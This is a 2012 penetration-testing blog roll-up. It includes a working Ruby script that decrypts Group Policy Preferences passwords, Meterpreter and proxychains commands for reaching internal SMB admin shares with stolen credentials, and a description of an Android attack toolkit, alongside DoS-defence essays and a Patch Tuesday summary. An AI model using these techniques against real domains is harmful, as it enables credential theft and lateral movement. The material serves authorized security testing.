Friday, October 19, 2012

Group Policy Preferences and Getting Your Domain 0wned

Group Policy Preferences and Getting Your Domain 0wned: So I put this link out on Twitter but forgot to put it on the blog.

I did a talk at the Oct 2012 NovaHackers meeting on exploiting 2008 Group Policy Preferences (GPP) and how they can be used to set local users and passwords via group policy.

I've run into this on a few tests where people are taking advantage of this extremely handy feature to set passwords across the whole domain, and in doing so allowing users or attackers the ability to decrypt those passwords and subsequently 0wn everything :-)
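For context: GPP stores these preference items in SYSVOL, which any domain user can read. A local-user entry in Groups.xml looks roughly like this (attributes trimmed, values illustrative; the cpassword is the same sample string decrypted below):

<!-- \\DOMAIN\SYSVOL\domain\Policies\{GUID}\Machine\Preferences\Groups\Groups.xml -->
<Groups>
  <User name="Administrator (built-in)" image="2">
    <Properties action="U" newName="" fullName="" description=""
        cpassword="j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw"
        userName="Administrator (built-in)"/>
  </User>
</Groups>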

 So here are the slides:

Exploiting Group Policy Preferences from chrisgates

Blog post explaining the issue in detail:
http://esec-pentest.sogeti.com/exploiting-windows-2008-group-policy-preferences

Metasploit post module:
http://metasploit.com/modules/post/windows/gather/credentials/gpp

PowerShell module to do it:
http://obscuresecurity.blogspot.com/2012/05/gpp-password-retrieval-with-powershell.html

I ended up writing some Ruby to do it (the blog post has some Python) because the Metasploit module was downloading the XML file to loot but taking a poop prior to getting to the decode part. Now you can do it yourself:


require 'rubygems'
require 'openssl'
require 'base64'

# cpassword value lifted from a GPP Groups.xml
encrypted_data = "j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw"

def decrypt(encrypted_data)
  # GPP strips the Base64 padding, so pad back out to a multiple of 4
  padding = "=" * ((4 - encrypted_data.length % 4) % 4)
  epassword = "#{encrypted_data}#{padding}"
  decoded = Base64.decode64(epassword)

  # static AES-256-CBC key Microsoft published in the GPP documentation (same for every domain)
  key = "\x4e\x99\x06\xe8\xfc\xb6\x6c\xc9\xfa\xf4\x93\x10\x62\x0f\xfe\xe8\xf4\x96\xe8\x06\xcc\x05\x79\x90\x20\x9b\x09\xa4\x33\xb6\x6c\x1b"
  aes = OpenSSL::Cipher::Cipher.new("AES-256-CBC")
  aes.decrypt
  aes.key = key
  plaintext = aes.update(decoded)
  plaintext << aes.final

  # plaintext is UTF-16LE; drop the high bytes to get a printable string
  pass = plaintext.unpack('v*').pack('C*')

  return pass
end

blah = decrypt(encrypted_data)
puts blah


In Action:

user@ubuntu:~$ ruby gpp-decrypt-string.rb
Local*P4ssword!

Thursday, October 18, 2012

DerbyCon 2012 - Security Vulnerability Assessments – Process and Best Practices

DerbyCon 2012 - Security Vulnerability Assessments – Process and Best Practices: Conducting regular security assessments on the organizational network and computer systems has become a vital part of protecting information-computing assets. Security assessments are a proactive and offensive posture towards information security, as compared to the traditional reactive and defensive stance normally implemented with the use of Access Control Lists (ACLs) and firewalls.

To effectively conduct a security assessment that is beneficial to an organization, a proven methodology must be followed so the assessors and assessees are on the same page.

This presentation will evaluate the benefits of credential scanning, scanning in a virtual environment, distributed scanning as well as vulnerability management.

BIO:
Kellep Charles (@kellepc) is the creator and Executive Editor of SecurityOrb.com (@SecurityOrb), an information security & privacy knowledge-based website with the mission to share and raise awareness of the motives, tools and tactics of the black-hat community, and provide best practices and counter measures against malicious events.
Kellep works as a government contractor in the Washington, DC area as an Information Security Analyst with over 15 years of experience in the areas of incident response, computer forensics, security assessments, malware analysis and security operations.
Currently he is completing his Doctorate in Information Assurance at Capitol College with a concentration in Artificial Neural Networks (ANN) and Human Computer Interaction (HCI). He also holds a Master of Science in Telecommunication Management from the University of Maryland University College and a Bachelor of Science in Computer Science from North Carolina Agricultural and Technical State University.

He has served as an Adjunct Professor at Capitol College in their Computer Science department. His industry certifications include Certified Information Systems Security Professional (CISSP), Cisco Certified Network Associate (CCNA), Certified Information Systems Auditor (CISA), National Security Agency – INFOSEC Assessment Methodology (NSA-IAM) and Information Technology Infrastructure Library version 3 (ITILv3) to name a few.

Wigle Wifi Wardriving meets Google Earth for Neat Wifi Maps

First, take your handy-dandy Android device and install Wigle Wifi Wardriving.

It uses the internal GPS and wifi to log access points, their security level and their GPS Position.

Looks like this (yup, I stole these):

List of access points

Also makes a cute map on your phone

Once you have the APs, you can export the "run" from the Data section. Yes, yes, the stolen photo says "Settings," but if you install it today it will say "Data" there now.

With the KML export you can import that directly into Google Earth and make all sorts of neat maps by toggling the data.
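Each access point in that export is just a KML Placemark; here is a trimmed, made-up example (note KML coordinates are in longitude,latitude order):

<Placemark>
  <name>CoffeeShopWiFi</name>
  <description>Encryption: WEP</description>
  <Point>
    <coordinates>-77.0364,38.8951,0</coordinates>
  </Point>
</Placemark>

Toggling the folders and placemarks in the Google Earth sidebar is what produces the maps below.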

All Access Points

Open Access Points

WEP Encrypted Access Points

That's it.

-CG




Mounting SMB shares over Meterpreter


OK, this is pretty straightforward, no magic:
Got a shell, doesn't have to be SYSTEM
Add a route to the internal range or directly to the host you want over the session you want
Mosey on over to the socks4a module. In another terminal, make sure your proxychains.conf file in /etc/ (or wherever you store your conf) is correct.
It defaults to 9050 on 127.0.0.1 for Tor; that's pretty easy to cope with and no reason to mess with it if you actually use it for Tor for other things.
Run the socks proxy with the Tor-like settings. (Remember to shut down Tor first.)
And the rest is gravy. The % (percent sign, in case the blog software mangles it) is a delimiter that smbclient and other Samba tools recognize between user and password (so it doesn't prompt you for it).
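Pulling it all together, the console session looks roughly like this (the session number, subnet, and creds below are placeholders for your own):

meterpreter > background
msf > route add 10.10.10.0 255.255.255.0 1
msf > use auxiliary/server/socks4a
msf auxiliary(socks4a) > set SRVHOST 127.0.0.1
msf auxiliary(socks4a) > set SRVPORT 9050
msf auxiliary(socks4a) > run

# last line of /etc/proxychains.conf:
socks4  127.0.0.1 9050

user@ubuntu:~$ proxychains smbclient //10.10.10.5/C$ -U 'VICTIM\administrator%P4ssword'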
And just to prove it works: yay, files. Yes, I know I didn't use smbmount, but it works the same, as does rpcclient.
A side note here is if you are using the pth-tools from:
https://code.google.com/p/passing-the-hash/
You can use hashes instead of passwords for stuff like this. But who are we kidding? Who doesn't get cleartext passwords anymore ;-)
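The general idea with the patched Samba tools (treat this as a sketch; exact binary names and syntax vary by version, and the hash shown is just the well-known empty-password LM:NT pair as a placeholder) is to export the hash and let the patched client substitute it:

export SMBHASH="aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0"
pth-smbclient //10.10.10.5/C$ -U administrator%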

Wednesday, October 10, 2012

dSploit - An Android network penetration suite

dSploit - An Android network penetration suite:
dSploit is an Android network analysis and penetration suite which aims to offer IT security experts/geeks the most complete and advanced professional toolkit to perform network security assessments on a mobile device.





Once dSploit is started, you will be able to easily map your network, fingerprint alive hosts' operating systems and running services, search for known vulnerabilities, crack logon procedures of many TCP protocols, and perform man-in-the-middle attacks such as password sniffing (with common protocol dissection), real-time traffic manipulation, etc.





This application is still in beta stage; a stable release will be available as soon as possible, but expect some crashes or strange behaviour until then. In any case, feel free to submit an issue on GitHub.


Requirements:

  • An Android device running at least version 2.3 (Gingerbread) of the OS.
  • The device must be rooted.
  • The device must have a full BusyBox install, meaning every utility installed (not the partial installation).
Available Modules



  • RouterPWN

    Launches the http://routerpwn.com/ service to pwn your router.
  • Port Scanner

    A SYN port scanner to quickly find open ports on a single target.
  • Inspector

    Performs deep detection of the target operating system and running services; slower than the SYN port scanner but more accurate.
  • Vulnerability Finder

    Searches the National Vulnerability Database for known vulnerabilities in the target's running services.
  • Login Cracker

    A very fast network logon cracker which supports many different services.
  • Packet Forger

    Crafts and sends a custom TCP or UDP packet to the target.
  • MITM

    A set of man-in-the-middle tools to command & conquer the whole network.


Download: https://github.com

    Defending Against DoS Attacks: Defense Part 1, the Network

    Defending Against DoS Attacks: Defense Part 1, the Network:
    In Attacks, we discussed both network-based and application-targeting Denial of Service (DoS) attacks. Given the radically different techniques between the types, it’s only logical that we use different defense strategies for each type. But be aware that aspects of both network-based and application-targeting DoS attacks are typically combined for maximum effect. So your DoS defenses need to be comprehensive, protecting against (aspects of) both types. Anti-DoS products and services you will consider defend against both. This post will focus on defending against network-based volumetric attacks.

    First the obvious: you cannot just throw bandwidth at the problem. Your adversaries likely have an unbounded number of bots at their disposal and are getting smarter at using shared virtual servers and cloud instances to magnify the amount of evil bandwidth they can bring to bear. So you can’t just hunker down and ride it out. They likely have a bigger cannon than you can handle. You need to figure out how to deal with a massive amount of traffic and separate good traffic from bad, while maintaining availability. Find a way to dump bad traffic before it hoses you, without throwing the baby (legitimate application traffic) out with the bathwater.

    We need to be clear about the volume we are talking about. Recent attacks have blasted upwards of 80-100gbps of network traffic at targets. Unless you run a peering point or some other network-based service, you probably don’t have that kind of inbound bandwidth. Keep in mind that even if you have big enough pipes, the weak link may be the network security devices connected to them. Successful DoS attacks frequently target network security devices and overwhelm their session management capabilities. Your huge expensive IPS might be able to handle 80gbps of traffic in ideal circumstances, but fall over due to session table overflow. Even if you could get a huge check to deploy another network security device in front of your ingress firewall to handle that much traffic, it’s probably not the right device for the job.

    Before you just call up your favorite anti-DoS service provider, ISP, or content delivery network (CDN) and ask them to scrub your traffic, understand that approach is no silver bullet either. It’s not like you can just flip a switch and have all your traffic instantly go through a scrubbing center. Redirecting traffic incurs latency, assuming you can even communicate with the scrubbing center (remember, your pipes are overwhelmed with attack traffic). Attackers choose a mix of network and application attacks based on what’s most effective in light of your mitigations.

    No, we aren’t only going to talk about more problems, but it’s important to keep everything in context. Security is not a problem you can ever solve – it’s about figuring out how much loss you can accept. If a few hours of downtime is fine, then you can do certain things to ensure you are back up within that timeframe. If no downtime is acceptable you will need a different approach. There are no right answers – just a series of trade-offs to manage to the availability requirements of your business, within the constraints of your funding and available expertise.

    Handling network-based attacks involves mixing and matching a number of different architectural constructs, involving both customer premise devices and network-based service offerings. Many vendors and service providers can mix and match between several offerings, so we don’t have a set of vendors to consider here. But the discussion illustrates how the different defenses play together to blunt an attack.

    Customer Premise-based Devices


    The first category of defenses is based around a device on the customer premises. These appliances are purpose-built to deal with DoS attacks. Before you turn your nose up at the idea of installing another box to solve such a specific problem, take another look at your perimeter. There is a reason you have all sorts of different devices. The existing devices already in your perimeter aren’t particularly well-suited to dealing with DoS attacks. As we mentioned, your IPS, firewall, and load balancers aren’t designed to manage an extreme number of sessions, nor are they particularly adept at dealing with obfuscated attack traffic which looks legitimate. Nor can other devices integrate with network providers (to automatically change network routes, which we will discuss later) – or include out-of-the-box DoS mitigation rules, dashboards, or forensics, built specifically to provide the information you need to ensure availability under duress.

    So a new category of DoS mitigation devices has emerged to deal with these attacks. They tend to include both optimized IPS-like rules to prevent floods and other network anomalies, and simple web application firewall capabilities which we will discuss in the next post. Additionally, we see a number of anti-DoS features such as session scalability, combined with embedded IP reputation capabilities, to discard traffic from known bots without full inspection. To understand the role of IP reputation, let’s recall how email connection management devices enabled anti-spam gateways to scale up to handle spam floods. It’s computationally expensive to fully inspect every inbound email, so dumping messages from known bad senders first enables inspection to focus on email that might be legitimate, and keeps mail flowing. The same methodology applies here.

    These devices should be as close to the perimeter as possible, to get rid of the maximum amount of traffic before the attack impacts anything else. Some devices can be deployed out-of-band as well, to monitor network traffic and pinpoint attacks. Obviously monitor-and-alert mode is less useful than blocking, which helps maintain availability in real time. And of course you will want a high-availability deployment – an outage due to a failed security device is likely to be even more embarrassing than simply succumbing to a DoS.

    But anti-DoS devices include their own limitations. First and foremost is the simple fact that if your pipes are overwhelmed, a device on your premises is irrelevant. Additionally, SSL attacks are increasing in frequency. It’s cheap for an army of bots to use SSL to encrypt all their attack traffic, but expensive for a network security device to terminate all SSL sessions and check all their payloads for attacks. That kind of computational cost arbitrage puts defenders in a world of hurt. Even load balancers, which are designed to terminate high SSL volumes, can face challenges dealing with SSL DoS attacks, due to session management limitations.

    So an anti-DoS device needs to integrate a number of existing capabilities such as IPS, network behavioral analysis, WAF, and SSL termination, combining them with highly scalable session management to cope with DoS attacks. And all that is still not enough – you will always be limited by the amount of bandwidth coming into your site. That brings us to network services, as a complement to premise-based devices.

    Proxies & CDN


    The first service option most organizations consider is a Content Delivery Network (CDN). These services enhance web site performance by strategically caching content. Depending on the nature of your site, a CDN might be able to dramatically reduce your ingress network traffic – if they can cache much of your static content. They also offer some security capabilities, especially for dealing with DoS attacks. The CDN acts as a proxy for your web site, so the provider can protect your site by using its own massive bandwidth to cope with DoS attacks for you. They have significant global networks, so even a fairly large volumetric attack shouldn’t look much different than a busy customer day – say a software company patching an operating system for a hundred million customers. Their scale enables them to cope with much larger traffic onslaughts than your much smaller pipes. Another advantage of a CDN is its ability to obscure the real IP addresses of your site, making it more difficult for attackers to target your servers. CDNs can also handle SSL termination if you allow them to store your private keys.

    What’s the downside? Protecting each site individually. If one site is not running through the CDN, attackers can find it through some simple reconnaissance and blast the vulnerable site. Even for sites running through the CDN, if attackers can find your controlling IPs they can attack you directly, bypassing the CDN. Then you need to mitigate the attack directly. Attackers also can randomize web page and image requests, forcing the CDN to request what it thinks is dynamic content directly from your servers over and over again. These cache misses can effectively cause the CDN to attack your servers. Obviously you want the CDN to be smart enough to detect these attacks before they melt your pipes and servers.

    Also be wary of excessive bandwidth costs. At the low end of the market, CDNs charge a flat fee and just eat the bandwidth costs if a small site is attacked. But enterprise deals are a bit more involved, charging for both bandwidth and protection. A DoS attack can explode bandwidth costs, causing an “economic DoS”, and perhaps shutting down the site when the maximum threshold (by contract or credit card limit) is reached. When setting up contracts, make sure you get some kind of protection from excessive bandwidth charges in case of attack.

    Anti-DoS Service Providers


    CDN limitations require some organizations to consider more focused network-based anti-DoS service providers. These folks run scrubbing centers – big data centers with lots of anti-DoS mitigation gear to process inbound floods and keep sites available. You basically flip a switch to send your traffic through the scrubbing center once you detect an attack. This switch usually controls BGP routing, so as soon as DNS updates and the network converge the scrubbing center handles all inbound traffic. On the backend you receive legitimate traffic through a direct connection – GRE tunnels to leverage the Internet, or a dedicated network link from the scrubbing center. Obviously there is latency during redirection, so keep that in mind.

    But what does a scrubbing center actually do? The same type of analysis as a premise-based device. The scrubbing center manages sessions, drops traffic based on network telemetry and IP reputation, blocks application-oriented attacks, and otherwise keeps your site up and available. Most scrubbing centers have substantial anti-DoS equipment footprints, amortized across all their customers. You pay for what you need, when you need it, rather than overprovisioning your network and buying a bunch of anti-DoS equipment for whenever you are actually attacked.

    Getting back to our email security analogy, think of an anti-DoS service provider like a cloud email security service. Back in the early days of spam, most organizations implemented their own email security gateways to deal with spam. When the inbound volume of email overwhelmed the gateways, organizations had to deploy more gateways and email filter hardware. This made anti-spam gateways a good business, until a few service providers started selling cloud services to deal with the issue. Just route your mail through their networks, and only good stuff would actually get delivered to your email servers. Spam flood? No problem – it’s the provider’s problem. Obviously there are differences – particularly that email filtering is full-time, while DoS filtering is on-demand during attacks.

    There are, of course, issues with this type of service, aside from the inevitable latency, which causes disruption while you reroute traffic to the scrubbing center. Scrubbing centers have the same SSL requirement as CDNs: termination requires access to your private key. Depending on your security tolerance, this could be a serious problem. Many large sites have tons of certificates and can cross-sign keys for the scrubbing center, but it does complicate management of the service provider.

    You will also need to spell out a process for determining when to redirect traffic. We will talk about this more when we go through the DoS defense process, but it generally involves an internal workflow to detect emerging attacks, evaluation of the situation, and then a determination to move the traffic – typically rerouting via BGP. But if your anti-DoS provider uses the same equipment you have on-site, that equipment might offer proprietary signaling protocols to automatically shift traffic based on thresholds. Though some network operations folks don’t enjoy letting Skynet redirect their traffic through different networks. What could possibly go wrong with that?

    Selection of an anti-DoS service provider is a serious decision. We recommend a fairly formal procurement process, which enables you to understand the provider’s technical underpinnings, network architecture, available bandwidth, geographic distribution, ability to handle SSL attacks, underlying anti-DoS equipment, and support for various signaling protocols. Make sure you are comfortable with the robustness of their DNS infrastructure, because DNS is a popular target and critical to several defenses. Also pay close attention to process hand-offs, responsiveness of their support group, and their research capabilities (to track attackers and mitigate specific attacks).

    The Answer: All of the Above


    Ultimately your choice of network-based DoS mitigations will involve trade-offs. It is never good to over-generalize, but most organizations will be best served by a hybrid approach, involving both a customer premise-based appliance and a contract with a CDN or anti-DoS service provider to handle severe volumetric attacks. It is simply not cost-effective to run all your traffic through a scrubbing center constantly, and many DoS attacks target the application layer – demanding use of a customer premise device anyway.

    In terms of service provider defense, many organizations can (and should) get started with a CDN. The CDN may be more attractive initially for its performance benefits, with anti-DoS and WAF capabilities as nice extras. Until you are attacked – at which point, depending on the nature of the attack, the CDN may save your proverbial bacon. If you are battling sophisticated attackers, or have a complicated and/or enterprise class infrastructure, you are likely looking at contracting with a dedicated anti-DoS service provider. Again, this will usually be a retainer-based relationship which gives you the ability to route your traffic through the scrubbing center when necessary – paying when you are under attack and sending them traffic.

    All this assumes your sites reside within your data center. Cloud computing fundamentally alters the calculations, requiring different capabilities and architectures. If your apps reside in the cloud you don’t have a customer premise where you can install devices, so you would instead consider a virtual appliance instance, routing traffic through your site before it hits the cloud, or using a CDN for all inbound traffic. You could also architect your cloud infrastructure to provision more instances as necessary to handle traffic, but it is easy to convert a DoS attack into an economic attack as you pay to scale up in order to handle bogus traffic. There are no clear answers yet – it is still very early in the evolution of cloud computing – but it is something to factor in as your application architects keep talking about this cloud thingy.

    Next we will address the application side of the DoS equation, before we wrap up with the DoS Defense process.

    - Mike Rothman
    (0) Comments

    Tuesday, October 9, 2012

    Microsoft Patch Tuesday, October 2012 – Legend of Zelda Edition

    Microsoft Patch Tuesday, October 2012 – Legend of Zelda Edition:
    Hope you enjoyed last month's light Patch Tuesday with only two bulletins, because this month we are right back at it with seven bulletins covering everything from elevation of privilege and denial of service to remote code execution. There is only one critical update this month, but there is also the enforcement of 1024-bit digital certificates. Probably the most interesting patch this month involves Lync, Microsoft's enterprise messaging system, if only for the reason that every time I read Lync I think Link, as in the hero of Nintendo's Legend of Zelda, which I spent way too much time playing back in the eighties.
    Much like Link needs to get keys to open doors in Hyrule, Microsoft products will often use certificates to allow communication between products. As of today, Microsoft products will reject any certificates with RSA keys of less than 1024 bits. Microsoft has made an optional patch available for the last two months to enforce this rule, but now it is no longer optional. Even if you are not using 512-bit keys, this is an excellent opportunity to update all your keys to 1024 bits or even more.
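    If you want to find weak keys before the patch finds them for you, OpenSSL will show the key size (cert.pem is a placeholder, and the exact label wording varies between OpenSSL versions):

      openssl x509 -in cert.pem -noout -text | grep "Public-Key"
              Public-Key: (2048 bit)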




    MS12-064 (KB 2742319)
    CRITICAL
    Remote Code Execution in Microsoft Word

    CVE-2012-0182
    CVE-2012-2528
    A specially crafted RTF file could allow an attacker to take complete control of a system to install their own programs, delete data or even create new accounts. (Sounds like something a WallMaster would do.) The vulnerability is present in most versions of Microsoft Word 2003, 2007, 2010 and even SharePoint Server 2010 SP1, and is caused by how Word handles memory when parsing certain files. This one can be a little tricky because Microsoft Word is set as the default mail reader in Outlook 2007 and 2010, which means that an attacker could leverage email as the attack vector to get you to open the specially crafted RTF file. This vulnerability has been hidden away in a dungeon (probably the Manji Dungeon) and has not yet been seen in the wild.

    MS12-065 (KB 2754670)
    IMPORTANT
    Remote Code Execution in Microsoft Works

    CVE-2012-2550
    The last time I used Microsoft Works was version 2.0 on my Mac SE, so I was surprised to learn that the current version is 9.0 and is still a supported and even a shipping product. Works 9.0 is still available at retail but is mostly used by OEMs to include with systems. If you are using Works 9.0 you will want to pay attention to this one, especially if you try to open Microsoft Word files with your version of Works. When Works attempts to convert a Word file it can potentially cause system memory corruption that could allow an attacker to execute arbitrary code. If you are using an older version of Microsoft Works you should really think about upgrading. Microsoft doesn't mention whether the vulnerability exists in older versions, since they are no longer supported, so to be safe you will want to upgrade.

    MS12-066 (KB 2741517)
    IMPORTANT
    Elevation of Privilege in HTML Sanitization

    CVE-2012-2520
    “But wait! All was not lost. A young lad appeared. He skillfully drove off Ganon’s henchmen and saved Impa from a fate worse than death. His name was Link.”

    OK, this one affects more than just Lync: also InfoPath, Communicator, SharePoint, Groove and Office Web Apps. However, as soon as I read Lync I immediately thought of our intrepid hero and his quest to save the lovely princess Zelda. But instead of being hunted by the evil forces of Ganon, this Lync is hunted by poorly sanitized HTML strings. The bad strings could allow cross-site scripting attacks that could run scripts in the context of the logged-on user. If you try to get the full Lync update through Automatic Update you won’t find it. The update for Lync 2010 Attendee (user level install) has to be handled through a Lync session, so the update is only available in the Microsoft Download Center. This one has escaped the dungeon and has been seen on a limited basis in the wild. (Just hiding under the sand like a Peahat, waiting to get you.)

    MS12-067 (KB 2742321)
    IMPORTANT
    Remote Code Execution in SharePoint FAST Search Server 2010

    CVE-2012-1766
    You only need to worry about this patch if you have the Advanced Filter Pack enabled on your FAST Search Server 2010 for SharePoint; it’s disabled by default. Exploitation of this vulnerability could allow an attacker to run arbitrary code in the context of a user account with a restricted token (Orange Rupee?). The flaw is actually in the Oracle Outside In libraries licensed by Microsoft. This is at least the second recent vulnerability we have seen in these libraries. While this one has not yet been seen in the wild, Microsoft thinks that code to exploit this vulnerability is likely to exist within the next thirty days.

    MS12-068 (KB 2724197)
    IMPORTANT
    Elevation of Privilege in Windows Kernel

    CVE-2012-2529
    I hate reading “all supported releases of Microsoft Windows”; it sends shivers up my spine like a Stalfos. However, this statement was closely followed by “except Windows 8 and Windows Server 2012”, which isn’t much consolation, but I’ll take it. This is a classic elevation of privilege, requiring an attacker to already have access to a system either through legitimate credentials or some other vulnerability. Once inside, an attacker could use this vulnerability to gain administrator level access.

    MS12-069 (KB 2743555)
    IMPORTANT
    Denial of Service in Kerberos

    CVE-2012-2551
    Unlike MS12-068, which affects just about everything, MS12-069 is only found in Windows 7 and Server 2008 R2. A specially crafted session request to the Kerberos server could result in a denial of service. If you have a properly configured firewall in place it will help protect your network from external attacks, sort of like Link’s shield protects against Tektites. Of course, that won’t do much good if the attacker is already inside your network.

    MS12-070 (KB 2754849)
    IMPORTANT
    Elevation of Privilege in SQL Server

    CVE-2012-2552
    If you are running the SQL Server Reporting Service then you have a problem validating input parameters which, if exploited, could cause an elevation of privilege. The XSS filter in Internet Explorer 8, 9, and 10 can protect users against this attack if it is enabled in the Intranet Zone, which is not the default. You can enable it by going to Internet Options -> Security Settings -> Intranet Zone -> Custom Level -> Enable XSS Filter, or just apply the patch offered through Automatic Updates. If you decide to do neither and a user clicks on a specially crafted link in email or browses to a specially crafted webpage, well, game over.

    “Can Link really destroy Ganon and save princess Zelda?”
    “Only your skill can answer that question. Good luck. Use the Triforce wisely.”


    Friday, October 5, 2012

    Defending Against DoS Attacks: The Attacks

    Defending Against DoS Attacks: The Attacks:
    Our first post built a case for considering availability as an aspect of security context, rather than only confidentiality and integrity. This has been driven by Denial of Service (DoS) attacks, which are used by attackers in many different ways, including extortion (using the threat of an attack), obfuscation (to hide exfiltration), hacktivism (to draw attention to a particular cause), or even friendly fire (when a promotion goes a little too well).

    Understanding the adversary and their motivation is one part of the puzzle. Now let’s look at the types of DoS attacks you may face – attackers have many arrows in their quivers, and use them all depending on their objectives and targets.

    Flooding the Pipes


    The first kind of Denial of Service attack is really a blunt force object. It’s basically about trying to oversubscribe the bandwidth and computing resources of network (and increasingly server) devices to impact resource availability. These attacks aren’t very sophisticated, but as evidenced by the ongoing popularity of volume-based attacks, they are fairly effective. These tactics have been in use since before the Internet bubble, leveraging largely the same approach. But they have gotten easier with bots to do the heavy lifting. Of course, this kind of blasting must be done somewhat carefully to maintain the usefulness of the bot, so bot masters have developed sophisticated approaches to ensure their bots avoid ISPs’ penalty boxes. So you will see limited bursts of traffic from each bot and a bunch of IP address spoofing to make it harder to track down where the traffic is coming from, but even short bursts from 100,000+ bots can flood a pipe.

    Quite a few specific techniques have been developed for volumetric attacks, but most look like some kind of flood. In a network context, the attackers focus on overfilling the pipes. Floods target specific protocols (SYN, ICMP, UDP, etc.), and work by sending requests to a target using the chosen protocol, but not acknowledging the response. Enough of these outstanding requests limit the target’s ability to communicate. But attackers need to stay ahead of Moore’s Law, because targets’ ability to handle floods has improved with processing power. So network-based attacks may include encrypted traffic, forcing the target to devote additional computational resources to process massive amounts of SSL traffic. Given the resource-intensive nature of encryption, this type of attack can melt firewalls and even IPS devices unless they are configured specifically for large-scale SSL support. We also see some malformed protocol attacks, but these aren’t as effective nowadays, as even unsophisticated network security perimeter devices drop bad packets at wire speed.

    These volume-based attacks are climbing the stack as well, targeting web servers by actually completing connection requests and then making simple GET requests and resetting the connection over and over again, with approximately the same impact as a volumetric attack – over-consumption of resources effectively knocking down servers. These attacks may also include a large payload to further consume bandwidth. The now famous Low Orbit Ion Cannon, a favorite tool of the hacktivist crowd, has undertaken a similar evolution, first targeting network resources and proceeding to now target web servers as well. It gets even better – these attacks can be magnified to increase their impact by simultaneously spoofing the target’s IP address and requesting sessions from thousands of other sites, which then bury the target in a deluge of misdirected replies, further consuming bandwidth and resources.

    Fortunately defending against these network-based tactics isn’t overly complicated, as we will discuss in the next post, but without a sufficiently large network device at the perimeter to block these attacks or an upstream service provider/traffic scrubber to dump offending traffic, devices fall over in short order.

    Overwhelming the Application


    But attackers don’t only attack the network – they increasingly attack the applications as well, following the rest of the attacker community up the stack. Your typical n-tier web application will have some termination point (usually a web server), an application server to handle application logic, and then a database to store the data. Attackers can target all tiers of the stack to impact application availability. So let’s dig into each layer to see how these attacks work.

    The termination point is usually the first target in application DoS attacks. They started with simple GET floods as described above, but quickly evolved to additional attack vectors. The best known application DoS attack is probably RSnake’s Slowloris, which consumes web server resources by sending partial HTTP requests, effectively opening connections and then leaving the sessions open by sending additional headers at regular intervals. This approach is far more efficient than the GET flood, requiring only hundreds of requests at regular intervals rather than constant thousands, and only requires one device to knock down a large site. These application attacks have evolved over time and now send complete HTTP requests to evade IDS and WAF devices looking for incomplete HTTP requests, but they tamper with payloads to confuse applications and consume resources. As defenders learn the attack vectors and deploy defenses, attackers evolve their attacks. The cycle continues.

    Web server based attacks can also target weaknesses in the web server platform. For example the Apache Killer attack sends a malformed HTTP range request to take advantage of an Apache vulnerability. The Apache folks quickly patched the code to address this issue, but it shows how attackers target weaknesses in the underlying application stack to knock the server over. And of course unpatched Apache servers are still vulnerable today at many organizations. Similarly, the RefRef attack leverages SQL injection to inject a rogue .js file onto a server, which then hammers a backend database into submission with seemingly legitimate traffic originating from an application server. Again, application and database server patches are available for the underlying infrastructure, but vulnerability remains if either patch is missing.

    Attackers can also target legitimate application functionality. One example of such an attack targets the search capability within a web site. If an attacker scripts a series of overly broad searches, the application can waste a large amount of time polling the database and presenting results. Likewise, attackers can game shopping carts by opening many shopping sessions, adding thousands of items to each cart, constantly refreshing the carts, and then abandoning them. Unless the application is architected to handle these use cases efficiently, such attacks accomplish their goals. For most sites, failing to return search results or track shopping carts is a complete failure with severe business ramifications. Which is the success scenario for a DoS attack.

    The advantage to application attacks is their ability to evade many of the defenses put in place to stop DoS. Our Managing WAF series discussed WAF evasion, and IDS evasion is a similarly mature and effective attack discipline. These network security devices are little more than speed bumps to knowledgeable attackers, so developers need to ensure their applications can deal with the attacks. That’s another point we made in the Application Lifecycle Integration post.

    Targeting the Defenses


    Attackers can also perform some reconnaissance to learn about targets’ defenses in order to game them. For instance, financial institutions tend to do a lot of security monitoring due to severe regulatory oversight requirements, so if an attacker constantly loads web pages or enters dummy transactions they may manage to overwhelm the monitoring system. Does this impact application availability? Probably not, but it at least hampers the security team’s efforts to figure out what’s going on, providing an opportunity for another attack to exfiltrate data undetected.

    Impacting the Wallet


    An emerging DoS attack works economically even when it does not impair service availability. The so-called EDoS (economic denial of service) attack involves a focused attempt to increase the cost of the target’s technology infrastructure. In a network attack, bad guys take advantage of excessive bandwidth charges. So even if a target successfully defends against an attack, the bandwidth consumed mitigating a multi-gigabit attack could cost as much as or more than an outage. Similarly, if a target leverages public cloud infrastructure to auto-provision new instances as utilization thresholds are met, an application attack can have a substantial financial cost without ever threatening availability. One potential endgame for cloud-based attacks is reaching the target’s credit limit with their cloud provider, triggering an outage when the provider caps their usage.

    Attackers can mix and match a variety of different DoS attacks to achieve their goal of adversely impacting availability of an application or service. Next we will move on to tactics and approaches to defend against DoS, starting with network attacks.

    - Mike Rothman
    (2) Comments

    New Series: Understanding and Selecting Identity Management for Cloud Services

    New Series: Understanding and Selecting Identity Management for Cloud Services:

    Adrian and Gunnar here, kicking off a new series on Identity Management for Cloud Services.


    We have been hearing about Federated Identity and Single Sign-On services for the last decade, but demand for these features has only fully blossomed in the last few years, as companies have needed to integrate their internal identity management systems with cloud services. The meanings of these terms have been actively evolving under the influence of cloud computing. The ability to manage what resources your users can access outside your corporate network – on third party systems outside your control – is not just a simple change in deployment models, but a fundamental shift in how we handle authentication, authorization, and provisioning. Enterprises want to extend to their users the capabilities of low-cost cloud service providers – while maintaining security, policy management, and compliance functions. We want to illuminate these changes in approach and technology. And if you have not been keeping up to date with these changes in the IAM market, you will likely need to unlearn what you know. We are not talking about making your old Active Directory accessible to internal and external users, or running LDAP in your Amazon EC2 constellation. We are talking about the fusion of multiple identity and access management capabilities – possibly across multiple cloud services. We are gaining the ability to authorize users across multiple services, without distributing credentials to each and every service provider.


    Cloud services – be they SaaS, PaaS, or IaaS – are not just new environments in which to deploy existing IAM tools. They fundamentally shift existing IAM concepts. It’s not just the way IT resources are deployed in the cloud, or the way consumers want to interact with those resources, that has changed – those changes are driven by economic models of efficiency and scale. For example, enterprise IAM is largely about provisioning users and resources into a common directory, say Active Directory or RACF, where the IAM tool enforces access policy. The cloud changes this model to a chain of responsibility, so a single IAM instance cannot completely mediate access policy. A cloud IAM instance has a shared responsibility in – as an example – assertion or validation of identity. Carving up this set of shared access policy responsibilities is a game changer for the enterprise.


